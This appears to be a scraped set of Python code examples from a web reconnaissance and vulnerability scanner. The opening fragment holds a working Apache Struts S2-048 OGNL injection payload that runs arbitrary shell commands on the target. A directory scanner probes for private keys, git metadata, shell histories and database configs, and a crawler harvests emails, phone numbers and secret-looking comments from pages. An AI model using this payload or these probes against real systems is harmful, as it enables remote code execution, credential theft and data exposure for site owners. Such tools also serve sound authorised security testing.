        payload = "name=%25%7B%28%23_%3D%27multipart%2fform-data%27%29.%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%[email protected]@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27" + cmd + "%27%29.%28%23iswin%3D%[email protected]@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%[email protected]@getResponse%28%29.getOutputStream%28%29%29%29.%[email protected]@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D&age=123&__cheackbox_bustedBefore=true&description=123"
        payload = payload.encode('utf-8')
        try:
            r = request.urlopen(self.url + '/integration/saveGangster.action',
                                payload)
            text = r.read()
        except http.client.IncompleteRead as e:
            text = e.partial
        except:
            pass
        if 'text' in locals().keys():
            self.random = str(self.random)
            if self.random.encode('utf-8') in text and len(text) < 15:
                self.result.append('Apache S2-048 Vulnerability: ' + self.url)

    def run(self):
        self.st032()
        self.st045()
        self.st016()
        self.st048()
        return self.result
Exemplo n.º 28
0
class DirScan():
    def __init__(self, dbname):
        self.notstr = ''
        self.notlen = ''
        self.goto = ''
        self.title = ''
        self.dbname = dbname
        self.ext = 'asp,php'
        self.outjson = []
        
        self.req = Requests()
    
    def get_urls(self, domain):
        domain = domain.replace('http://', '').replace('https://', '').rstrip('/')
        ext = self.ext.split(',')
        ext = list(map(lambda x: '.' + x, ext))
        path = [
            "/robots.txt", "/README.md", "/crossdomain.xml", "/.git/config",
            "/.hg"
            "/.git/index", "/.svn/entries", "/.svn/wc.db", "/.DS_Store",
            "/CVS/Root", "/CVS/Entries", "/.idea/workspace.xml",
            "/nginx_status", "/.mysql_history", "/login/", "/phpMyAdmin",
            "/pma/", "/pmd/", "/SiteServer", "/admin/", "/Admin/", "/manage",
            "/manager/", "/manage/html", "/resin-admin", "/resin-doc",
            "/axis2-admin", "/admin-console", "/system", "/wp-admin",
            "/uc_server", "/debug", "/Conf", "/webmail", "/service",
            "/memadmin", "/owa", "/harbor", "/master", "/root", "/xmlrpc.php",
            "/phpinfo.php", "/zabbix", "/api", "/backup", "/inc",
            "/web.config", "/httpd.conf", "/local.conf", "/sitemap.xml",
            "/app.config", "/.bash_history", "/.rediscli_history", "/.bashrc",
            "/.history", "/nohup.out", "/.mysql_history", "/server-status",
            "/solr/", "/examples/",
            "/examples/servlets/servlet/SessionExample", "/manager/html",
            "/login.do", "/config/database.yml", "/database.yml", "/db.conf",
            "/db.ini", "/jmx-console/HtmlAdaptor", "/cacti/",
            "/jenkins/script", "/memadmin/index.php", "/pma/index.php",
            "/phpMyAdmin/index.php", "/.git/HEAD", "/.gitignore",
            "/.ssh/known_hosts", "/.ssh/id_rsa", "/id_rsa",
            "/.ssh/authorized_keys", "/app.cfg", "/.mysql.php.swp",
            "/.db.php.swp", "/.database.php.swp", "/.settings.php.swp",
            "/.config.php.swp", "/config/.config.php.swp",
            "/.config.inc.php.swp", "/config.inc.php.bak", "/php.ini",
            "/sftp-config.json", "/WEB-INF/web.xml",
            "/WEB-INF/web.xml.bak", "/WEB-INF/config.xml",
            "/WEB-INF/struts-config.xml", "/server.xml",
            "/config/database.yml", "/WEB-INF/database.properties",
            "/WEB-INF/log4j.properties", "/WEB-INF/config/dbconfig",
            "/fckeditor/_samples/default.html", "/ckeditor/samples/",
            "/ueditor/ueditor.config.js",
            "/javax.faces.resource...%2fWEB-INF/web.xml.jsf", "/wp-config.php",
            "/configuration.php", "/sites/default/settings.php", "/config.php",
            "/config.inc.php", "/data/config.php", "/data/config.inc.php",
            "/data/common.inc.php", "/include/config.inc.php",
            "/WEB-INF/classes/", "/WEB-INF/lib/", "/WEB-INF/src/", "/.bzr",
            "/SearchPublicRegistries.jsp", "/.bash_logout",
            "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile",
            "/test2.html", "/conf.ini", "/index.tar.tz", "/index.cgi.bak",
            "/WEB-INF/classes/struts.xml", "/package.rar",
            "/WEB-INF/applicationContext.xml", "/mysql.php", "/apc.php",
            "/zabbix/", "/script", "/editor/ckeditor/samples/", "/upfile.php",
            "/conf.tar.gz",
            "/WEB-INF/classes/conf/spring/applicationContext-datasource.xml",
            "/output.tar.gz", "/.vimrc", "/INSTALL.TXT", "/pool.sh",
            "/database.sql.gz", "/o.tar.gz", "/upload.sh",
            "/WEB-INF/classes/dataBase.properties", "/b.php", "/setup.sh",
            "/db.php.bak", "/WEB-INF/classes/conf/jdbc.properties",
            "/WEB-INF/spring.xml", "/.htaccess",
            "/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp",
            "/.htpasswd", "/id_dsa", "/WEB-INF/conf/activemq.xml",
            "/config/config.php", "/.idea/modules.xml",
            "/WEB-INF/spring-cfg/applicationContext.xml", "/test2.txt",
            "/WEB-INF/classes/applicationContext.xml",
            "/WEB-INF/conf/database_config.properties",
            "/WEB-INF/classes/rabbitmq.xml",
            "/ckeditor/samples/sample_posteddata.php", "/proxy.pac",
            "/sql.php", "/test2.php", "/build.tar.gz",
            "/WEB-INF/classes/config/applicationContext.xml",
            "/WEB-INF/dwr.xml", "/readme", "/phpmyadmin/index.php",
            "/WEB-INF/web.properties", "/readme.html", "/key"
        ]
        leaks = Cartesian()
        leaks.add_data([
            '/www', '/1', '/2016', '/2017', '/2018', '/2019', '/wwwroot',
            '/backup', '/index', '/web', '/test', '/tmp', '/default', '/temp',
            '/extra', '/file', '/qq', '/up', '/config', '/' + domain
        ])
        leaks.add_data([
            '.tar.gz', '.zip', '.rar', '.sql', '.7z', '.bak', '.tar', '.txt',
            '.log', '.tmp', '.gz', '.bak~', '.sh'
        ])
        path.extend(leaks.build())
        index = Cartesian()
        index.add_data([
            '/1', '/l', '/info', '/index', '/admin', '/login', '/qq', '/q',
            '/shell', '/p', '/a', '/userinfo', '/api', '/common', '/web',
            '/manage', '/loading', '/left', '/zzzz', '/welcome', '/ma', '/66'
        ])
        index.add_data(ext)
        path.extend(index.build())
        return set(path)
    
    def diff(self, text):
        result = difflib.SequenceMatcher(None, self.notstr, text).quick_ratio()
        return result
    
    def _verify(self, r, goto, title):
        result = True
        if r.status_code in BLOCK_CODE:
            result = False
        if r.headers['Content-Type'] in BLOCK_CONTYPE:
            result = False
        if len(r.text) == self.notlen:
            result = False
        if goto == self.goto:
            result = False
        for i in PAGE_404:
            if i in r.text:
                result = False
                break
        if title == self.title and title != 'None':
            result = False
        return result
    
    def check404(self, url):
        # 访问一个随机的页面记录404页面的长度与内容
        key = str(random.random() * 100)
        random_url = base64.b64encode(key.encode('utf-8'))
        url = url + '/' + random_url.decode(
            'utf-8') + '.html'
        try:
            r = self.req.get(url)
            self.notstr = r.text[:10000]
            self.notlen = len(r.text)
            if r.is_redirect:
                self.goto = r.headers['Location']
        except Exception as e:
            logging.exception(e)
    
    def scan(self, host):
        try:
            r = self.req.get(host)
            if r.is_redirect:
                goto = r.headers['Location']
            else:
                goto = 'test'
            if r.headers['Content-Type']:
                contype = re.sub('\w+/', '', str(r.headers['Content-Type']))
                contype = re.sub(';.*', '', contype)
            else:
                contype = 'None'
            text = r.text[:10000]
            title = re.search('(?<=<title>).*(?=</title>)', text)
            if self._verify(r, goto, title):
                if contype == 'html':
                    result = self.diff(text)
                else:
                    result = 0
                if result < 0.8:
                    if title == None:
                        title = 'None'
                    else:
                        title = title.group()
                    title = re.sub(r'\n|\t', '', title)
                    urlresult = parse.urlparse(host)
                    sys.stdout.write(bcolors.OKGREEN + '[+] {}{:^12}{:^14}\t{:^18}\t{:^8}\n'.format(
                        r.status_code, len(r.text), title, contype, str(r.url)) + bcolors.ENDC)
                    data = {
                        urlresult.netloc: {
                            "rsp_code": r.status_code,
                            "rsp_len": len(r.text),
                            "title": title,
                            "contype": contype,
                            "url": urlresult.path
                        }
                    }
                    self.outjson.append(data)
        except Exception as e:
            pass
        return 'OK'
    
    def save(self, urls):
        Sqldb(self.dbname).get_urls(urls)
    
    def run(self, task):
        print(bcolors.RED + 'URLS:' + bcolors.ENDC)
        with concurrent.futures.ThreadPoolExecutor(
            max_workers=THREADS) as executor:
            futures = [executor.submit(self.scan, i) for i in task]
            for future in concurrent.futures.as_completed(futures):
                future.result()
        self.save(self.outjson)
    
    # 创建启动任务
    def pool(self, host):
        self.check404(host)
        task = []
        urls = self.get_urls(host)
        for url in urls:
            task.append(host + url)
        self.run(task)
Exemplo n.º 29
0
def start(url):
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    sys.stdout.write(bcolors.RED + '-' * 100 + '\n' + bcolors.ENDC)
    sys.stdout.write(bcolors.RED + 'Host: ' + host + '\n' + bcolors.ENDC)
    sys.stdout.write(bcolors.RED + '-' * 100 + '\n' + bcolors.ENDC)
    address = geoip(ipaddr)
    try:
        # 判断主域名是否开放
        req = Requests()
        r = req.get(url)
    except Exception as e:
        pass
    if 'r' in locals().keys():
        wafresult = checkwaf(host)
        try:
            coding = chardet.detect(r.content).get('encoding')
            r.encoding = coding
            webinfo = (WebPage(r.url, r.text, r.headers).info())
        except Exception as e:
            webinfo = {}
        if webinfo:
            sys.stdout.write(bcolors.RED + "Webinfo:\n" + bcolors.ENDC)
            sys.stdout.write(bcolors.OKGREEN +
                             '[+] Title: {}\n'.format(webinfo.get('title')) +
                             bcolors.ENDC)
            sys.stdout.write(
                bcolors.OKGREEN +
                '[+] Fingerprint: {}\n'.format(webinfo.get('apps')) +
                bcolors.ENDC)
            sys.stdout.write(bcolors.OKGREEN +
                             '[+] Server: {}\n'.format(webinfo.get('server')) +
                             bcolors.ENDC)
            sys.stdout.write(bcolors.OKGREEN +
                             '[+] WAF: {}\n'.format(wafresult) + bcolors.ENDC)
    else:
        webinfo = {}
        wafresult = 'None'
    pdns = virustotal(host)
    reverseip = reverse_domain(host)
    webinfo.update({"pdns": pdns})
    webinfo.update({"reverseip": reverseip})
    if iscdn(host):
        open_port = ScanPort(url).pool()
    else:
        open_port = ['CDN:0']
    osname = osdetect(host)
    data = {
        host: {
            'WAF': wafresult,
            'Ipaddr': ipaddr,
            'Address': address,
            'Webinfo': webinfo,
            'OS': osname,
        }
    }
    web_save(data)
    Vuln(host, open_port, webinfo.get('apps')).run()
    if 'r' in locals().keys() and not SCANDIR:
        dirscan = DirScan('result')
        dirscan.pool(url)
Exemplo n.º 30
0
class Crawl:
    def __init__(self, host, dbname):
        self.urls = []
        self.js = []
        self.domain = ''
        self.dbname = dbname
        self.host = host
        self.result = []
        self.req = Requests()

    def jsparse(self, r):
        try:
            html = etree.HTML(r.text)
            result = html.xpath('//script/@src')
            for i in result:
                if not re.search(
                        r'jquery|bootstrap|adsbygoogle|angular|javascript|#|vue|react|51.la/=|map\.baidu\.com|canvas|cnzz\.com|slick\.js|autofill-event\.js|tld\.js|clipboard|Chart\.js',
                        i):
                    if '://' not in i:
                        i = re.sub(r'^/|^\.\./', '', i)
                        i = self.host + '/' + i
                    self.js.append(i)
        except (AttributeError, AttributeError, ValueError):
            pass
        except Exception as e:
            logging.exception(e)

    def extr(self, url, body):
        # html页面内提取邮箱
        email = re.findall(
            r'\b[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', body)
        if email:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + '  Email: ' + x, email)))
        # html页面内提取手机号
        phone = re.findall(
            r'\b(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}\b',
            body)
        if phone:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + '  Phone: ' + x, phone)))
        # html注释内提取ip地址
        ipaddr = re.findall(
            r'(?<=<!--).*((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)).*(?=-->)',
            body)
        if ipaddr:
            self.result.extend(list(map(lambda x: 'IP: ' + x, ipaddr)))
        # html注释内提取https连接
        links = re.findall(
            r'(?<=<!--).{0,120}((?:http|https):[\w\./\?\-=&]+).{0,120}(?=-->)',
            body)
        if links:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + '  Links: ' + x, links)))
        # html注释内提取a连接
        links2 = re.findall(
            r'(?<=<!--).{0,120}a\shref="([\-\w\.\?:=\&/]+)".{0,120}(?=-->)',
            body)
        if links2:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + '  Links: ' + x, links2)))
        links3 = re.findall(
            r'(?<=<!--).{0,120}\b(?:usr|pwd|uname|uid|file|upload|manager|webadmin|backup|account|admin|password|pass|user|login|secret|private|crash|root|xxx|fix|todo|secret_key|token|auth_token|access_token|username|authkey|user_id|userid|apikey|api_key|sid|eid|passwd|session_key|SESSION_TOKEN|api_token|access_token_secret|private_key|DB_USERNAME|oauth_token|api_secret_key|备注|笔记|备份|后台|登陆|管理|上传|下载|挂马|挂链)\b.{0,120}(?=-->)',
            body)
        if links3:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + '  Links: ' + x, links3)))

    def parse_html(self, host):
        try:
            r = self.req.get(host)
            self.jsparse(r)
            self.extr(r.url, r.text)
            urlparse = parse.urlparse(host)
            domain = urlparse.netloc
            if not self.domain:
                self.domain = domain
            html = etree.HTML(r.text)
            result = html.xpath('//a/@href')
            for link in result:
                if not re.search('#|mail*|^/$|javascript', link):
                    if 'http' not in link:
                        if urlparse.netloc:
                            link = urlparse.scheme + '://' + urlparse.netloc + '/' + link
                        else:
                            link = 'http://' + host + '/' + link
                    if domain in link:
                        if '=' not in link:
                            self.urls.append(link)
        except (UnboundLocalError, AttributeError, ValueError):
            pass
        except Exception as e:
            logging.exception(e)

        self.urls = dedup_url(self.urls)

        return list(set(self.urls))

    def pool(self):
        result = self.parse_html(self.host)
        try:
            with concurrent.futures.ThreadPoolExecutor(
                    max_workers=30) as executor:
                futures = [executor.submit(self.parse_html, i) for i in result]
                for future in concurrent.futures.as_completed(futures,
                                                              timeout=3):
                    future.result()
        except (EOFError, concurrent.futures._base.TimeoutError):
            pass
        except Exception as e:
            logging.exception(e)

        jslink = JsLeaks().pool(self.js)

        self.result.extend(jslink)
        self.result = list(set(self.result))

        for i in self.result:
            console('Crawl', self.host, i + '\n')

        Sqldb(self.dbname).get_crawl(self.domain, self.result)